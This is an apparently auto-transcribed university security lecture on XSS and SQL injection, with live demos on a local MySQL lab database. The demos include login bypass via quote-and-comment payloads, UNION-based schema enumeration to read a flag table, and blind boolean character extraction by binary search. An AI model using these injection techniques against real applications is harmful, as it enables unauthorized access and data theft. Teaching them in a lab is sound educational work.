could alter the permissions of the destination file you could fundamentally do do anything you wanted to do as that root user so you could U do all kinds of fun stuff but yeah so think creatively like as if you were as root there you can&amp;#39;t get the output of the command but you want to get that file eventually cool okay moving to HTML yes question sure you are running as root set you ID is only so that copy would run as root right so the uh the fact is you are fundamentally running as root when you cont trick the the challenge binary the challenge web server is running as root so it can do anything yeah cool other questions wow super weird that nobody&amp;#39;s sitting over there did you all do that on purpose nobody wanted to sit on that third of the room just all gravitated over here weirdly but some people come in that way I don&amp;#39;t know yeah I am over I mean obviously it makes sense but it&amp;#39;s very weird because most people have sat over there anyways okay this is what happens when it&amp;#39;s close to Thanksgiving okay so other huh are you trying to get no this has been a whole room you guys have been normally equally is spread out in in the terms of this room nobody has to sit over there don&amp;#39;t move because all your stuff&amp;#39;s there that&amp;#39;s a false uh false moves but hey look you have such a good better view of the screen there anyways sorry I noticed these things okay so other things so we talked about HTML right HTML is a web application&amp;#39;s way of specifying to the user what the structure of the document should look like what links they can click on what forms they can fill out what things they can do to the web application and so very often a web application will create its HTML response by again concatenating strings together so here is an example application that has in between P tags has a string hello comma and then some name in red being the user&amp;#39;s input so why might this functionality exist you&amp;#39;re writing an application have you ever seen a website do this I can start calling on people does that help start at the left side of the room and go what&amp;#39;s up yeah so the idea being now it&amp;#39;s a dynamic website that nicely greets the user right so depending on who the user is how they&amp;#39;re logged in right we can see oh it&amp;#39;s this user great I can be a friendly application I can say hello to that specific person maybe like so maybe the results that I give are also unique to that user so the feed that I&amp;#39;m showing whatever if it&amp;#39;s like a Facebook Newsfeed thing or a whatever but the point is like I can customize my HTML response to each of you depending on who you are now the problem is if that input comes directly from the user now fundamentally I can control and and have any code that I want be executed there and one of the key things so again if we go back to let me look at it&amp;#39;s here yes so we look back at HTML right so now if I can inject content and control the structure of this HTML page I can get it to be whatever I want now does it seem seem that exciting maybe I can add more links to the page or something or I don&amp;#39;t know get them to trick trick them to click on something um but a key thing that we can make them do is do I not have any uh one of the key things that we can do is actually get them to execute some code that will run inside of their browser which actually sounds insane um and it&amp;#39;s because it is every time your browser accesses a web page almost every single page will send you some code that your browser running on your machine interprets an executes whatever code that website sends um and that is Javascript so let&amp;#39;s look at I guess we can look at here there is some JavaScript in here yes where I start poking around remember how this works sources I think scripts yeah there we go cool so there&amp;#39;s a ton of JavaScript this is all JavaScript that&amp;#39;s executed every time you visit any uh site on pone College similar sty uh JavaScript exists everywhere else but the point is this is code that is running inside of your browser and has access to everything inside of this web page so oops hello okay let me show an example okay I am going to increase the font size here okay let&amp;#39;s go back to our example cool okay so this isn&amp;#39;t really a dynamic website this is literally just going to be me editing a text file and then us loading that text file in our browser uh let&amp;#39;s see if I can cool everyone see on the right I have this so if we pass in the name of csse 365 refresh right so just like a dynamic website so my browser is parsing this and again because it&amp;#39;s a parser it has to figure out where are those starting and ending tags so we can do cool things like uh we can change our we can change our name and make it into a link that the user can click um can I change what happens before here no I can&amp;#39;t because this is a constant string that is concatenated so I can&amp;#39;t control what happens before and I can&amp;#39;t control what happens afterwards right so every time we&amp;#39;re thinking about injection we need to be thinking about what parts do I control and what parts don&amp;#39;t I control so here I&amp;#39;m controlling just this name in here um I could really uh mess things up I could do maybe ending HTML oops and then the page looks literally like this oh where&amp;#39;s the inspect source source yeah so now it&amp;#39;s kind of like depends on how the parser is going to interpret this will it like do this as the end of the page will it keep showing the stuff that&amp;#39;s after let&amp;#39;s check if I write something after here I actually do see that that&amp;#39;s really weird I&amp;#39;m not sure if this is common for all browser engines um I can start another yeah HTML tag and then what if I end this one anyways the point is I can completely control everything that happens here but one of the big things I would want to do is start executing JavaScript so uh JavaScript was I&amp;#39;m going to go back and we&amp;#39;re going to go back in time okay okay all right since I know we got a little bit of time we can do this ah there we go cool so this was the modern HTML lab we&amp;#39;ve been looking at very static has images tables you can set font size but fundamentally the content was static and this actually gave rise to early websites like lot Yahoo did you guys know Yahoo was literally just a a like a Yellow Pages or a directory for the internet so there were different categories if you&amp;#39;re interested in art or education or entertainment you could click in there and there would be links to other places on the web so it&amp;#39;s just a way literally to find things in this incredibly uh this is actually even before there&amp;#39;s a time before where it didn&amp;#39;t even have search there was no ability to search here um this was the first Amazon website um and you can see very simple just literally a website to sell books Ulta Vista was one of the first uh search engines that actually allowed you to like type in stuff in the search bar and it would just very crappily look for any web page that had that search term in it um and this was the actually the shocking thing about all this is this was the first Google Beta from 1998 and um you can see that it&amp;#39;s almost exactly the same it&amp;#39;s actually even simpler of a more or less of a design the Google homepage than it was here um but the important problem is we want to be able to do fancy things and animations and being able to dynamically respond on the client because every time you clicked a link on any of these Pages or hit the search bar your your browser would then have to make a new HTTP request to the server the server would process it send the response back in HTML and your browser then parse that HTML but for sometimes you don&amp;#39;t need all of that and that became the birth of JavaScript so I want to tell you a little bit about the history here it was originally designed as a language to run inside your browser to interact and manipulate with HTML how many of you know Java yeah many of you great JavaScript has nothing in common with Java except for the first four letters um and this was actually a literal um so it was originally created in 1995 for Netscape one of the browsers at the time called livescript you like he you got to like script things live in your browser it was renamed in December 1995 uh literally um JavaScript as an open crossplatform object scripting language for the creation and customization of applications on Enterprise networks and the internet this is in 1995 whereas JavaScript in Wikipedia is a prototype based scripting languages with Dynamic typing and first class functions uh so this actually has nothing to do with Java it&amp;#39;s literally a different like it&amp;#39;s the syntax is very similar because they both derive syntax from C but fundamentally like prototype based is very much in opposition to class and object orientation so calling it an object scripting language is like super weird uh literally they um they it was basically like a marketing Ploy because believe it or not I know this may be very hard to believe at the time but in like 1995 Java was considered the hot new language like U I don&amp;#39;t know what&amp;#39;s a hot new language that you all think is cool for us like yeah rust so this was like the rust actually it&amp;#39;s a very good uh app description because with Java they told everyone like hey this is great um you don&amp;#39;t have to worry about buffer overflows just like rust and you write once and deploy everywhere because you write it it compiles to the jvm and different jvm implementations run on different machines uh what it turned out was right once debug everywhere was actually the real thing that happened and so uh anyways hope in 20 years maybe you&amp;#39;ll remember this class and as soon as people you tell uh people that you used to think rust was cool and they go W that&amp;#39;s such an old language why would you ever think that but anyways um in 1996 Microsoft added support for JavaScript to internet exp Internet Explorer and it turned into a standardization so the JavaScript language was standardized in 1996 but fundamentally was just created for One browser to add some Dynamic capabilities and now it is essentially the Lang of the web so JavaScript is fundamentally the way that you uh think about and is supported by all browsers and it evolved organically along the way which is why it&amp;#39;s very very weird uh but let me show you some examples so you use the script element or the script tags is the um way of creating JavaScript so you have script tags uh this was a very very old style of doing this where you had um these tags here is a HTML comment so it tells the browser hey consider anything in here to be a comment and this was for browsers that didn&amp;#39;t support JavaScript that way they wouldn&amp;#39;t show what was in the script tags so if you&amp;#39;re a browser and you did support it you would know not to take off those HTML comments and you would start executing the code there so you can do things like uh there&amp;#39;s a whole um system and stuff but it&amp;#39;s very similar to what you&amp;#39;re doing it&amp;#39;s not anything that&amp;#39;s too crazy so you can prompt things like hey please enter your name you can set that to a variable called name you can check if name is null then write welcome to my site otherwise write welcome to my site and then the plus is concatenation here and so you can do this uh you can also specify exactly the language here although this is really not needed now um so you could run this page and it would say hey please enter your name below you could enter something like Adam in and then it would say hey welcome to my site Adam okay uh you can also include external Javascript files this is actually not strictly needed for what we&amp;#39;re doing but something that&amp;#39;s very useful is you can have a source attribute then have an absolute or relative URL and so the browser when it parses this will make another HTTP request fetch that content and execute it as if it was javascrip code okay I&amp;#39;m going to skip all this we don&amp;#39;t need to do this okay JavaScript though is okay so everything in JavaScript is an object and guess what you learned Json way back when when you were making web requests by hand in netcat those fun fun days um so Json those everything in curly braces and Json derives from the Syntax for JavaScript for objects uh objects are pretty sweet they&amp;#39;re just like hash tables or arrays you can add properties and values at runtime so you can have something like VAR object equals and so the curly braces is so this is a object that has one property named test with the value Fu as a string and another property numb with the value of 50 we can then so objects you can think of things they can be recursive you can have object uh and this is accessing a property so this is with array syntax saying the object the property with name FU set it to be equal to object and we can log itself so we can do object test is what here in this example Fu and then object fu is the object itself because we said it here object Fu you can set num to be a th000 we can log it and then we can look at it here in the console one of the cool things is you can just uh if you&amp;#39;re ever curious about how something works in JavaScript you can open up your good old web browser here in the console you can just put code here and you can just type it in uh can I make this oh yeah there we go so I can type all this in here so I can look and inspect this object so this is my object called object that has three properties Fu num and test fu is the object itself so if you keep going down Fu it&amp;#39;ll go down here forever um one thing so I use this syntax right object bracket string Fu this is one way you can access properties the other way is the dot syntax so you can just say object. FU and it&amp;#39;s EX exactly the same thing it&amp;#39;s literally just it&amp;#39;s the same syntax uh the fu is the just the same syntactic sugar for the exact same thing okay okay I think that&amp;#39;s all we need to do under here this much more complicated stuff so what we can do is now we are here so once we have this injection we can write any JavaScript code we want inside of script tags one of the classic things uh if you look up the alert function so instructs the browser to display a dialogue with an optional message this is one of the ways that uh as security analysts we show that we can execute JavaScript code on your web page by making it pop up a window here so so this is Javascript code so this is when I refresh that the very first thing it does it&amp;#39;s parsing this and did the developer the original developer this website intended did they intend for there to be JavaScript code here no this is only because we the attacker tricked the web application to include this JavaScript code and so we can do whatever we want here we can um I think that&amp;#39;s how you do it let&amp;#39;s see nope that&amp;#39;s writing it there I always have to look this stuff up JavaScript overwrite HTML of page ah. replace document. replace oh okay document Open document right document close that&amp;#39;s HTML inner HTML there we go that&amp;#39;s that works boom so completely changing the content of the page um we can do let&amp;#39;s see you redirect is a document Dot redirect with JavaScript may have blocked it because of the domains oh location that&amp;#39;s right boom so redirecting them to another place fundamentally I can do whatever I want I can um if the web application uses cookies which this one probably will not ah it won&amp;#39;t even let me go back that&amp;#39;s really yeah undefined because I don&amp;#39;t have any cookies uh let&amp;#39;s insert some cookies storage local storage add new password I don&amp;#39;t know JavaScript depends on how it set the cookies but let me just double check cookie not cookies see this is why reading the documentation is so important this is why I had to tell you of what to do and that did nothing I can go to the console here document. cookies cookie cookies yeah there we go cool so if cookies were set I could get them I guess it should be like this yeah it could be about the specific way that I set them um if you could get them or not there are like lots of possible security measures here but fundamentally I could do anything and this means that if I was now and especially if you&amp;#39;re logged into this website I can now act as you as the user so I could steal your cookies to try to log in as you I could have you the user transfer me remember when we looked at the uh the bank transferring money right between things I will introduction oh yeah here we go here&amp;#39;s our good friend the bank right so if I were able to trick blue into executing code from Green from the bank that says hey transfer money $1,000 from Red the bank has no idea that this is coming from not coming from the actual user so you can really do anything um there cool okay questions here all right oh and I guess uh uh just for the record when you go out into the world this is called cross-site scripting the idea being another an a criminal or a hacker got you tricked your browser into executing JavaScript that they wanted to execute so that&amp;#39;s the cross site so uh and the abbreviation for this is xss so if you see that that&amp;#39;s what that means okay cool now again another case where people want to concatenate strings is with with when creating SQL queries so here we have a SQL query select star from users where username equals single quote Conor single quote and password equals single quote password one two3 single quote this was the example when we&amp;#39;re looking at SQL so what&amp;#39;s the point of this query what would be a use case of this query yeah yeah why would we want to look for the specific users information say it again yeah so we&amp;#39;re we&amp;#39;re trying to check so this would be an application where they&amp;#39;re trying to check did the user provide the correct username and password right so like yeah they&amp;#39;re going to log in we&amp;#39;re going to check first hey does there exist any user in this database that has the username Conor and the password of password two 3 if if it does presumably then we would log the user in that&amp;#39;s exactly what this query would do now now fundamentally if we control what&amp;#39;s in the string Connor and here in this password we can fundamentally put in whatever we want here so let&amp;#39;s do you guys want to try it on a real database no where is there real database um oh there we go this is where you&amp;#39;re just hoping that somewhere back back in your history somebody did this once okay where do I have a web server running access such a pain I don&amp;#39;t like SQL light uh okay I think I have an idea let&amp;#39;s see I usually I can quick quickly install something on here can&amp;#39;t locate the package MySQL oh it&amp;#39;s MySQL server okay we&amp;#39;ll just St in MySQL server on a random thing we&amp;#39;ll create the table this will be super fun and then we will hack it okay it&amp;#39;s running very good progress all right now I&amp;#39;m into my SQL server or I&amp;#39;m I&amp;#39;m running so now when I&amp;#39;m typing commands in here this as if we&amp;#39;re running queries so I could say select and let me make this bigger okay it&amp;#39;s going to say error no database collected uh so use wait do I create it first use 365 my SQL okay I did okay oh I guess I can&amp;#39;t do that create database hack me use hack me create what is it table [Music] users all right my SQL h a data type varchars are great just means variable characters okay I see actually it should just work without the strings no yay okay insert into users values uh admin super secret uh want to make sure insert into users values value one value two how do I do multiple values I think it&amp;#39;s just separated by commas like this okay and let&amp;#39;s go back to our thing admin password a [Music] Conor okay password 2 three select hey got data in there cool okay now let&amp;#39;s go back to our query so we&amp;#39;re going to simulate having a website we are writing this statement okay select so it&amp;#39;s going to be select star from users where username is equal to name and password equals password okay so let&amp;#39;s run this okay why did that return nothing we don&amp;#39;t have anything in the database that matches that okay we did have the example of why is there space in front of here why is this not saving this query it&amp;#39;s GNA drive me insane okay Connor so now if we know Connor&amp;#39;s password we can log in and that returns one user so our web application would say great user accepted log in awesome okay so weird so you can write in anything where into this string where do you what do you control the username and password specifically after the single quotes so why is the so the application is specifically uh adding single quotes around your input because it knows that this is how you specify a string in my SQL so specifically here and here we control inside of those strings awesome so select start from users username is equal to Connor so we can put in if there&amp;#39;s no restrictions from the web application we can put in whatever we want here so what might we want to put in yeah another single quote what&amp;#39;s the point of that single quote so it matches the first single quote and now now what do you want to type in yeah so or maybe so we say username is equal to blank 1 equals 1 what do you want to put in for password let&amp;#39;s just do password okay what&amp;#39;s gonna happen when I hit enter yeah it&amp;#39;s not going to let me and I wish it didn&amp;#39;t do this uh oh I have an idea okay let&amp;#39;s do this is a great example I&amp;#39;ll do this quit Pudo MySQL do you just write the command here no it&amp;#39;s uh first the database name hack me and thenc yeah that&amp;#39;s right okay thank you okay cool because I wanted to simulate more of what happened and as you saw when we tried to enter that command the MySQL uh prompt wouldn&amp;#39;t even let you type that prompt in because it has a syntax error what&amp;#39;s the problem we put in single quote space or space one equals one and then the application put a single quote and password equals to and then this single quote but then there&amp;#39;s a password and then like a dangling single quote right so we&amp;#39;re very close here but the problem is we&amp;#39;re not matching those things and the problem is there&amp;#39;s a bunch of gibberish that we have to deal with after this so what was the trick we used in command injection in order to not have to deal with anything that came after us what was that comment it out let&amp;#39;s look up I think we talked about it in the last one but let&amp;#39;s look at my SQL comment syntax from a dash character to the end of the line or from a A or sorry a hash character to the end of the line or from a Double Dash to the end of the line um I&amp;#39;m going to show you the Double Dash because the database you&amp;#39;re going to be using is SQL light and I want to show you one that works on both I believe it&amp;#39;s Double Dash yeah and so you can see this anybody remember remember this uh this type of graph back when we looked at Json syntax so here in SQL light dash dash to anything except new line to new line will be a comment and that&amp;#39;s the same in sqlite and in my SQL so we do this really hope that was going to work why did that not work oh I think we need a space yes there we go okay why did we need the space because the characters were specifically a Double Dash without any space at the end I guess my sequel is trying to interpret that as its own thing and doesn&amp;#39;t really see the uh let&amp;#39;s actually look this is crazy ah insane I wonder if this is what messed me up on a CTF once it&amp;#39;s interesting anyways okay so what did this do why did this return us all the results in the database yeah so this is the query that we ran select star from users where username is equal to blank or 1 equals 1 how many times is 1 equals 1 true it&amp;#39;s all always true and true or false is true so this returns true for every single Row in the database and return all of the rows what if we just wanted to return the admin rather than doing or one equals one what would we do louder admin and then what if I do this what is it going to do still GNA return to all why yeah for all of them so how do I fix it say it again cool so now let&amp;#39;s say we do this on the login form we say hey we want to log in as the admin here&amp;#39;s my password password but actually I say we don&amp;#39;t want to log in as admin we want to log in as admin tick space-- space and it goes it says oh yep there&amp;#39;s one result that&amp;#39;s good let me log you in now as this user and then boom you&amp;#39;ve now logged in as the admin user and we we can even go let&amp;#39;s see where are we going here make sure I&amp;#39;m balancing the time cool oh yeah perfect okay we can even go crazier than here so let&amp;#39;s [Music] do let&amp;#39;s uh create table I feel like I have that syntax nope uh create table flag uh let&amp;#39;s say there&amp;#39;s flag that&amp;#39;s a varar 255 okay insert into flag values P get get this flag okay so let&amp;#39;s say we get this output well let&amp;#39;s say it&amp;#39;s not uh the username and password but whatever we get this output but we can control so again we can control anything in password we kind of figured we don&amp;#39;t need to do that because we can deal with anything that&amp;#39;s in here so we can just by changing this username now can I control anything that happens before the username select star from users where no we cannot but so we you can use this as we saw to get anybody&amp;#39;s username we can also so let me did did we talk about that I seeq will get tables so let&amp;#39;s look up yeah cool so it turns out two things we need to look at one let&amp;#39;s go back to just our normal my SE e gross okay that&amp;#39;s too many tables ah this person sucks okay table schema test I haven&amp;#39;t seen that my SQL this has a ton of information let&amp;#39;s see DB5 okay okay here&amp;#39;s oh am I not wait use ha nope okay I feel like this should be a lot easier okay there we go yeah there we go why does that reveal so much I thought there was like okay well here is our hack me and here is the users and flags yeah there we go thank you but what do we put for table is it a base table let&amp;#39;s just do a select all on that this is something you can look up by the way it&amp;#39;s not uh yeah but where&amp;#39;s the oh God what okay but why why is this this should be very simple what are you trying to select I want see the tables but just the user tables like why is there all this there&amp;#39;s a bunch of junk tables there&amp;#39;s 330 tables you want to make it slightly simp table yeah I would like this but with only the user table this definitely way oh they&amp;#39;re right at the top but uh all right I will find this no okay that was gonna be a cool demo all right oh that&amp;#39;s what I want inject all the things hey there we go payload all the things that&amp;#39;s what okay this has everything I could ever need cheat sheet my SQL injection uh my SQL oh good it has all the comments testing yes okay great great extract database with information schema thank you tables that&amp;#39;s annoying oh schema okay great ah okay okay okay so these are all the different databases excellent okay and then ah there we go I hate how it does this I see so I had to First figure out what the database name was okay uh and I could just do the table name got it okay now I figured out how to Pivot here okay perfect where were we cool okay okay so we are back here select start from users we username equals blot okay this is where we were great now let&amp;#39;s say we have our tick now everybody remember our friend the union syntax which was used to Union two select statements yeah so how many columns did we did our users table have two columns we may or may not know that depending if we don&amp;#39;t we can actually just keep guessing we can do Fu uh that&amp;#39;s right let&amp;#39;s just go we go like this okay there we go that&amp;#39;s the syntax so this select Fu bar yeah so if we did and what&amp;#39;s super interesting you won&amp;#39;t have to get into this but oh it does do that so you can figure out how many columns are needed by just keeping adding one to the select statement until you get the correct you get an output a non-error everything else errors so what this does is says Hey select start from users for username is equal to nothing which we don&amp;#39;t care about Union that with select one two3 well select one two3 is not very useful and select Fubar is also not useful why is this not useful yeah well this Fu Barb like we gave that input so it&amp;#39;s just proving that what we give comes back to us but we gave that so that&amp;#39;s not interesting um but I don&amp;#39;t even know where the data is that I want but I know by looking it up in that uh payload all the things that I can select in my SQL and other database engines have very similar things I could say select and that&amp;#39;s going to fail because that has the different wrong number of columns so what I really want from here where did I want from schemata I want the schema name select schema name again not going to work because when I&amp;#39;m unioning has one column on the right side and two columns on the left so I just need to add something so this shows me that hey there&amp;#39;s the my SQL schema in information schema performance schema CIS and hackme hackme sounds good let&amp;#39;s figure out all the tables in hackme so now I can use my other query now that I know that I can do where was my query there we go so now I&amp;#39;m going to Union that query with select star from information scheme. taes where table schema is equal to hack me that will not work so I want I believe it&amp;#39;s just called T table name so table name I have flag in users I&amp;#39;m already quaring all the all the users table so which data do I want like which table do I want of these two tables flag we want the flag let&amp;#39;s get the flag I actually from here I don&amp;#39;t know what the columns are but you can actually read if you really want to you can read all the columns in that table so you can figure out of the flags table what are the columns there but we can do that here now that I know what table to search for select start from Flags wrong number of columns so I actually now will need to do that so let&amp;#39;s select columns where table name okay select star from columns where table name is equal to flag okay wrong number of columns I will do column name aha there&amp;#39;s a flag so it should just be select flag from flag that won&amp;#39;t work because of the wrong number of columns FX flag comma one ah there we go so now I&amp;#39;ve finally got the flag so fundamentally from doing this you can actually uh get are the parentheses necessary around this this select statement no they&amp;#39;re not it just helped me when I was doing that uh that was a question on Twitch SQL syntax is almost a little too forgiving so I like to I just be very careful there yeah yeah so this just means so so what I&amp;#39;m saying is hey select from the table flags and for my results I want the First Column to be flag whatever is in the database as flag and the second column I just want to be one like the literal one so that&amp;#39;s what this does this just makes this just returns one for the password I could make it return a string as Fu I can make it return whatever I want I could put flag twice but the important thing is because the with the Union the select on the left the users table has two columns that the result when you Union them has to have two otherwise you can&amp;#39;t put them together right if like think about like building blocks right you have like like Legos you have to size two and you had a one and try to put that on there that&amp;#39;s not going to work if you had a three that&amp;#39;s too big it has to be exactly the same size so that you&amp;#39;re your application gets all those same results and the crazy thing is do they I can&amp;#39;t remember do they do this in the assignment of uh of blind yeah so what&amp;#39;s crazy is you can so we were able to read the flag here why because we can see the output here right in this table we we see these results the application may or may not give us the results here so um one so there but you can do uh really cool things you can actually and there is a I guess I don&amp;#39;t have it installed um do we have it installed on the dojo no so we can do cool things like okay let me see I want do this users you can select let&amp;#39;s see there are hey there we go so we can actually do things like select or let&amp;#39;s say we can&amp;#39;t get this so all we&amp;#39;re getting output is Fufu uh but we can say where left flag let&amp;#39;s see string length say one so so what I can do is I can set up a SQL query such that if it returns something if it it returns a results if the first character of the flag so the left this left function I just looked up from the documentations specifies the number of characters from the L of the string both the number and the string are supplied as arguments of the function so this would be the string and the length so I can iterate over this and brute force all the characters from A to Z big a to Big Z 0 through nine and what&amp;#39;s the difference how do I know if I&amp;#39;m correct wait why did that work SQL must be case insensitive that was not what I me to show wow that&amp;#39;s annoying okay this is the problem when you just copy and paste random stuff okay SQL case sensitive comparison my squel ah okay all right it&amp;#39;s fine okay so I know it&amp;#39;s not a I know it&amp;#39;s not B but when I get to P so why is that so so let&amp;#39;s say the application will give me an error if there&amp;#39;s nothing or give me a page like a 500 versus a 200 error so the only thing I can see I can&amp;#39;t see what it returns but I can know if my query gave zero results or nonzero results so that&amp;#39;s what we&amp;#39;re doing here is by checking and taking the flag by creating a wear Clause such that by creating a wear Clause such that I have a condition based on part of the flag and a value that I Supply I can then test and I can make 255 of these queries for each character um I can even let&amp;#39;s see my SQL SQL function or python there&amp;#39;s a way to like turn it yeah there we go no not python yeah or just like ah it is or so just like in um in what iall it in Python we can call or on this to turn it into an integer and then that will not work but if we do man asky let&amp;#39;s see p is at 70 and capital P is going to be at 5050 and these are hex aha there we go so now we found a way to determine the case of this so if our program in the first case gives us a 500 error we can use that so this is the crazy thing is with one bit of information whether the query returns something or doesn&amp;#39;t return something we we can completely we can use this to Brute Force this and what&amp;#39;s even crazier uh so what&amp;#39;s faster than a linear search through 0 to 255 to see which one hits somebody&amp;#39;s taking 310 yeah yeah so it&amp;#39;s faster than a linear search so rather than searching zero trying everything zero to 255 yeah a binary search so I can do something like because I don&amp;#39;t have to do equality I can do less than or equal to right so I can say say is is this less than and I would do what&amp;#39;s in the middle of 255 and 255 by two let&amp;#39;s say 127 which it definitely will be so this is a yes so I got a yes response because I got something back so okay so I can do zero now between 27 275 so I can do 127 divid 2 63 nope it&amp;#39;s not less than that so I know it&amp;#39;s somewhere between 63 and 2 127 uh 63 uh this is doing this by hand is kind of a pain but this is why you have computers 96 96 so it&amp;#39;s not so it&amp;#39;s between 96 and 127 112 okay it&amp;#39;s not that Conor you&amp;#39;re you&amp;#39;re a great orle 120 yes so it&amp;#39;s between 120 and 112 116 116 yes so between 116 and 112 118 118 yes 119 119 yes also yes I have to check quality at some point right something is wrong oh Conor Conor Conor con so it&amp;#39;s not less than 112 but it is less than 120 and less than I see yeah so we should have gone down after 18 right uh so we should have done 114 we will find it correct yes not 112 so what does that mean it is it is yeah or so yay and binary search well you know we are not computers it&amp;#39;s okay if we&amp;#39;re not doing the binary search properly yes there we go okay that&amp;#39;s octal so it&amp;#39;s octal decimal and hex so it&amp;#39;s p so we figured out the first character we can do yes thank you there&amp;#39;s much rejoicing from the audience um oh shoot that took a long time okay so we first have to then put everything together of why is this safe so as we talked about with Java Script you have basically random code that you&amp;#39;re downloading onto your machine and the whole point is that your browser wants to ensure that different websites and different tabs you can think of as tabs can&amp;#39;t really mess with each other so when you&amp;#39;re accessing something and you&amp;#39;re including images there from let&amp;#39;s say red and from Blue your browser will then go and fetch those and it can um yes so when you so uh the way this works is it gets to the what is the same origin policy so the origin is this three tle of scheme host and Port scheme being HTTP or https host being the domain name and Port being the port of the connection so anything that where those triple is the same it exists in the same origin so for instance um HTTP example.com has the I hate this is uh the dreaded Google slides to PowerPoint conversion uh example.com the root site has the origin HTTP example.com and 80 which if you&amp;#39;re fetching cat.gif from there it&amp;#39;s the same HTTP example 80 whereas if it&amp;#39;s from a different origin even if it&amp;#39;s the exact same host and Port that is a different origin different port is a different and so you can send cross origin requests if there are uh wow okay Dam all right uh sorry we&amp;#39;re at the end of time we&amp;#39;re G have to we spend too much time on SQL injection but uh we&amp;#39;ll do this on Wednesday

Transcript for:End of Semester, Command Injection, HTML and SQL Injection

Transcript for:
End of Semester, Command Injection, HTML and SQL Injection